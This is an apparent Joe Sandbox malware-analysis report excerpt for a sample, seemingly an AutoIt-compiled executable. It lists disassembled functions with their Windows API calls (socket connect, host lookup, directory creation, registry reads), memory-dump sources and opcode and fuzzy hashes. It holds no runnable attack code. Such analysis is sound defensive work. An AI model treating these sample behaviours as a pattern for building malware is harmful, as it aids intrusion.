                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast$_memmove_strlenselect
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2795762555-0
                                                                                                                  • Opcode ID: a3b6805e4ec79db118c91c08e7df2a321faf5aa8c7057d6602c099ecf58d3253
                                                                                                                  • Instruction ID: e26316f1ee93a810838c9b516beaa7f83b1c1928b69642f69aac60f7bf172847
                                                                                                                  • Opcode Fuzzy Hash: a3b6805e4ec79db118c91c08e7df2a321faf5aa8c7057d6602c099ecf58d3253
                                                                                                                  • Instruction Fuzzy Hash: F0415075504209AFCB18EBA4CD99FAEB7B9EF48310F108159F51A97291EB30EE41CB74
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D73B1E: _wcsncpy.LIBCMT ref: 00D73B32
                                                                                                                  • GetFileAttributesW.KERNEL32(?,?,00000000), ref: 00DB6DBA
                                                                                                                  • GetLastError.KERNEL32 ref: 00DB6DC5
                                                                                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 00DB6DD9
                                                                                                                  • _wcsrchr.LIBCMT ref: 00DB6DFB
                                                                                                                    • Part of subcall function 00DB6D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 00DB6E31
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3633006590-0
                                                                                                                  • Opcode ID: 648fd0935f73fb17df0aa9bea81e1c0f7495f9918978635c8aee4245d0b790c8
                                                                                                                  • Instruction ID: cc1a8e7a9ef957e0200735a2450a3acda8aac383fa259aefdb2fba07d2e6f74a
                                                                                                                  • Opcode Fuzzy Hash: 648fd0935f73fb17df0aa9bea81e1c0f7495f9918978635c8aee4245d0b790c8
                                                                                                                  • Instruction Fuzzy Hash: D7210225601314DADF206774EC4AAEE33ADCF01720F288166F026D30D2EB28CE84DB74
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DCACD3: inet_addr.WS2_32(00000000), ref: 00DCACF5
                                                                                                                  • socket.WS2_32(00000002,00000001,00000006,?,?,00000000), ref: 00DC9160
                                                                                                                  • WSAGetLastError.WS2_32(00000000), ref: 00DC916F
                                                                                                                  • connect.WS2_32(00000000,?,00000010), ref: 00DC918B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLastconnectinet_addrsocket
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3701255441-0
                                                                                                                  • Opcode ID: 0711cbce4e8f65cc2109a88760b5ee60260e393f59fc2eaffa82f06e76ecd63c
                                                                                                                  • Instruction ID: 7d58dccd30029b650f9b3e8ee588e0ac646edacde676e8ce3038c6c9d6309f88
                                                                                                                  • Opcode Fuzzy Hash: 0711cbce4e8f65cc2109a88760b5ee60260e393f59fc2eaffa82f06e76ecd63c
                                                                                                                  • Instruction Fuzzy Hash: BF213E712002119FDB00AB68C89AF7EB7AAEB44724F188559F9569B391DA70A8018771
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: dE
                                                                                                                  • API String ID: 0-1919509572
                                                                                                                  • Opcode ID: e86ee9d8feadad6576a8b755cdd5b332ce66693500e8850554f47d6c5e29bcdf
                                                                                                                  • Instruction ID: 6dc350c01c006b8d0eb0fef208db25576773999cf2729b8ccb15f3a665222eb7
                                                                                                                  • Opcode Fuzzy Hash: e86ee9d8feadad6576a8b755cdd5b332ce66693500e8850554f47d6c5e29bcdf
                                                                                                                  • Instruction Fuzzy Hash: 2AF15C716087019FC710DF24C580B9ABBE6FF88314F14892EF9999B292D771E945CFA2
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D73F9B: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00D734E2,?,00000001), ref: 00D73FCD
                                                                                                                  • _free.LIBCMT ref: 00DE3C27
                                                                                                                  • _free.LIBCMT ref: 00DE3C6E
                                                                                                                    • Part of subcall function 00D7BDF0: GetCurrentDirectoryW.KERNEL32(00000104,?,?,00002000,?,00E322E8,?,00000000,?,00D73E2E,?,00000000,?,00E0DBF0,00000000,?), ref: 00D7BE8B
                                                                                                                    • Part of subcall function 00D7BDF0: GetFullPathNameW.KERNEL32(?,00000104,?,?,?,00D73E2E,?,00000000,?,00E0DBF0,00000000,?,00000002), ref: 00D7BEA7
                                                                                                                    • Part of subcall function 00D7BDF0: __wsplitpath.LIBCMT ref: 00D7BF19
                                                                                                                    • Part of subcall function 00D7BDF0: _wcscpy.LIBCMT ref: 00D7BF31
                                                                                                                    • Part of subcall function 00D7BDF0: _wcscat.LIBCMT ref: 00D7BF46
                                                                                                                    • Part of subcall function 00D7BDF0: SetCurrentDirectoryW.KERNEL32(?), ref: 00D7BF56
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CurrentDirectory_free$FullLibraryLoadNamePath__wsplitpath_wcscat_wcscpy
                                                                                                                  • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                                                                  • API String ID: 1510338132-1757145024
                                                                                                                  • Opcode ID: ff90cae85f4ee015b2cc345529f86db1165440c8e1129f2154927379014dd58b
                                                                                                                  • Instruction ID: 0104112446dd85a06bb7ef8c1bf51d83aa89ed1ed874969f1ffb4b3320c74c23
                                                                                                                  • Opcode Fuzzy Hash: ff90cae85f4ee015b2cc345529f86db1165440c8e1129f2154927379014dd58b
                                                                                                                  • Instruction Fuzzy Hash: 50913971910259AFCF04EFA9CC959EEB7B4FF08310F14402AF456AB291EB749A45CB70
                                                                                                                  APIs
                                                                                                                  • __getstream.LIBCMT ref: 00D9418E
                                                                                                                    • Part of subcall function 00D9889E: __getptd_noexit.LIBCMT ref: 00D9889E
                                                                                                                  • @_EH4_CallFilterFunc@8.LIBCMT ref: 00D941C9
                                                                                                                  • __wopenfile.LIBCMT ref: 00D941D9
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                                                                                                                  • String ID: <G
                                                                                                                  • API String ID: 1820251861-2138716496
                                                                                                                  • Opcode ID: 93ed46c65955d8569d5594b607f46f4820f8f4300668dc064636a224c6498e1c
                                                                                                                  • Instruction ID: 58238f345e9be933da03b6b909b7ef4f69869ccc97e6e1c8e73c4287af47f888
                                                                                                                  • Opcode Fuzzy Hash: 93ed46c65955d8569d5594b607f46f4820f8f4300668dc064636a224c6498e1c
                                                                                                                  • Instruction Fuzzy Hash: A2110670910316ABDF20BFB49C42A6F3BA4FF55360B188525A418EB282EB74C9829771
                                                                                                                  APIs
                                                                                                                  • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00D8C948,SwapMouseButtons,00000004,?), ref: 00D8C979
                                                                                                                  • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,00D8C948,SwapMouseButtons,00000004,?,?,?,?,00D8BF22), ref: 00D8C99A
                                                                                                                  • RegCloseKey.KERNEL32(00000000,?,?,00D8C948,SwapMouseButtons,00000004,?,?,?,?,00D8BF22), ref: 00D8C9BC
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseOpenQueryValue
                                                                                                                  • String ID: Control Panel\Mouse
                                                                                                                  • API String ID: 3677997916-824357125
                                                                                                                  • Opcode ID: 958b575caa213e56078f94951d4bd0bbb6c07907102a9b5446af12daa0c85cf9
                                                                                                                  • Instruction ID: f09618ee40b932395bdb85e04c04e7ea3f6d7b2c6604a5eb64799de977f8a895
                                                                                                                  • Opcode Fuzzy Hash: 958b575caa213e56078f94951d4bd0bbb6c07907102a9b5446af12daa0c85cf9
                                                                                                                  • Instruction Fuzzy Hash: 2D117C75521218FFDB10AF64DC44EAE77B8EF04742F00949AF941E7210E6319E40DB70
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: feccc5730834e8baa57ef52d19e4ce9c6faa6feb784ccdc546ca91d551d1dc89
                                                                                                                  • Instruction ID: 00e57cac104a8f31e1eafd2739d4706ece865e64fc2a96ddc45eff49fe21d981
                                                                                                                  • Opcode Fuzzy Hash: feccc5730834e8baa57ef52d19e4ce9c6faa6feb784ccdc546ca91d551d1dc89
                                                                                                                  • Instruction Fuzzy Hash: DDC15C75A00216EFCB14CFA8C984EAEB7B5FF49704F148699E905AB291D730DE41CBB1
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D741A7: _fseek.LIBCMT ref: 00D741BF
                                                                                                                    • Part of subcall function 00DBCE59: _wcscmp.LIBCMT ref: 00DBCF49
                                                                                                                    • Part of subcall function 00DBCE59: _wcscmp.LIBCMT ref: 00DBCF5C
                                                                                                                  • _free.LIBCMT ref: 00DBCDC9
                                                                                                                  • _free.LIBCMT ref: 00DBCDD0
                                                                                                                  • _free.LIBCMT ref: 00DBCE3B
                                                                                                                    • Part of subcall function 00D928CA: RtlFreeHeap.NTDLL(00000000,00000000,?,00D98715,00000000,00D988A3,00D94673,?), ref: 00D928DE
                                                                                                                    • Part of subcall function 00D928CA: GetLastError.KERNEL32(00000000,?,00D98715,00000000,00D988A3,00D94673,?), ref: 00D928F0
                                                                                                                  • _free.LIBCMT ref: 00DBCE43
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1552873950-0
                                                                                                                  • Opcode ID: 66bc342b584f0e90e8e3921fe03708e5c63b2722386060f4a17f54ef5e71cd11
                                                                                                                  • Instruction ID: f46ab7adb899112858dd2b304fc7d309fde0cfd79480f3336486b47bbb0f4f41
                                                                                                                  • Opcode Fuzzy Hash: 66bc342b584f0e90e8e3921fe03708e5c63b2722386060f4a17f54ef5e71cd11
                                                                                                                  • Instruction Fuzzy Hash: 33510BB5904218AFDF15EF64CC81AAEBBB9FF48300F1044AEB65DA3251D7715A808F79
                                                                                                                  APIs
                                                                                                                  • _memset.LIBCMT ref: 00D71E87
                                                                                                                    • Part of subcall function 00D738E4: _memset.LIBCMT ref: 00D73965
                                                                                                                    • Part of subcall function 00D738E4: _wcscpy.LIBCMT ref: 00D739B5
                                                                                                                    • Part of subcall function 00D738E4: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00D739C6
                                                                                                                  • KillTimer.USER32(?,00000001), ref: 00D71EDC
                                                                                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00D71EEB
                                                                                                                  • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00DE4526
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1378193009-0
                                                                                                                  • Opcode ID: a983748de1e6270cd7621c3b100698868d09cad46cad58aaa9c880a9e3e31234
                                                                                                                  • Instruction ID: da71f3105655719372141835f0fbd01ce6636e0777b8a555ad26f19fae2676b7
                                                                                                                  • Opcode Fuzzy Hash: a983748de1e6270cd7621c3b100698868d09cad46cad58aaa9c880a9e3e31234
                                                                                                                  • Instruction Fuzzy Hash: E321F9759047C4AFEB329B298855BEBBBEC9B01308F08408DF6DE97241D3745A84CB71
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D8F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00DBAEA5,?,?,00000000,00000008), ref: 00D8F282
                                                                                                                    • Part of subcall function 00D8F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00DBAEA5,?,?,00000000,00000008), ref: 00D8F2A6
                                                                                                                  • gethostbyname.WS2_32(?), ref: 00DC92F0
                                                                                                                  • WSAGetLastError.WS2_32(00000000), ref: 00DC92FB
                                                                                                                  • _memmove.LIBCMT ref: 00DC9328
                                                                                                                  • inet_ntoa.WS2_32(?), ref: 00DC9333
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1504782959-0
                                                                                                                  • Opcode ID: 51a520cf7a5716371905f606d380ca13cf79cfc05b99592544aad9c4d3ff29c9
                                                                                                                  • Instruction ID: 61334431f3585fd651f668fcbf8fd9b5f81b01e0bd04e8422d8533968df7b2b1
                                                                                                                  • Opcode Fuzzy Hash: 51a520cf7a5716371905f606d380ca13cf79cfc05b99592544aad9c4d3ff29c9
                                                                                                                  • Instruction Fuzzy Hash: C2112E7650010AAFCB05FBA4CD56DEEB7BAEF14315B148059F506A72A2EB30AE04DB71
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D945EC: __FF_MSGBANNER.LIBCMT ref: 00D94603
                                                                                                                    • Part of subcall function 00D945EC: __NMSG_WRITE.LIBCMT ref: 00D9460A
                                                                                                                    • Part of subcall function 00D945EC: RtlAllocateHeap.NTDLL(01790000,00000000,00000001), ref: 00D9462F
                                                                                                                  • std::exception::exception.LIBCMT ref: 00D9013E
                                                                                                                  • __CxxThrowException@8.LIBCMT ref: 00D90153
                                                                                                                    • Part of subcall function 00D97495: RaiseException.KERNEL32(?,?,00D7125D,00E26598,?,?,?,00D90158,00D7125D,00E26598,?,00000001), ref: 00D974E6
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                                                  • String ID: bad allocation
                                                                                                                  • API String ID: 3902256705-2104205924
                                                                                                                  • Opcode ID: 8970d4b2f7b90752f48059705d7a6dfbd307f0970703ab96a979f5b4d391a607
                                                                                                                  • Instruction ID: 2643d5ab29abd56d748742acbc067fda7ebb2eeaed6c833beaf2f986ee0a988f
                                                                                                                  • Opcode Fuzzy Hash: 8970d4b2f7b90752f48059705d7a6dfbd307f0970703ab96a979f5b4d391a607
                                                                                                                  • Instruction Fuzzy Hash: 38F0AF3510831EAACF15AFE8E8029EE7BE9EF04354F144415FA04E2182DBB0D69096B5
                                                                                                                  APIs
                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,00D7C00E,?,?,?,?,00000010), ref: 00D7C627
                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,00000010), ref: 00D7C65F
                                                                                                                  • _memmove.LIBCMT ref: 00D7C697
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharMultiWide$_memmove
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3033907384-0
                                                                                                                  • Opcode ID: 40a9ebfaeeba6a72b1e674fdd8c2258bd7aa9286fa33554b0970d0a6af40fa32
                                                                                                                  • Instruction ID: e563774f6ce16ccb45c6ac5f0cda7cb1ee06640e8483122d60d39966b3bb545b
                                                                                                                  • Opcode Fuzzy Hash: 40a9ebfaeeba6a72b1e674fdd8c2258bd7aa9286fa33554b0970d0a6af40fa32
                                                                                                                  • Instruction Fuzzy Hash: 4E31C8B2601301AFDB249F68D846A2BB7D9EF54310F14952EF95EC72A0FB31E9508771
                                                                                                                  APIs
                                                                                                                  • SHGetMalloc.SHELL32(00D73C31), ref: 00D73A7D
                                                                                                                  • SHGetPathFromIDListW.SHELL32(?,?), ref: 00D73AD2
                                                                                                                  • SHGetDesktopFolder.SHELL32(?), ref: 00D73A8F
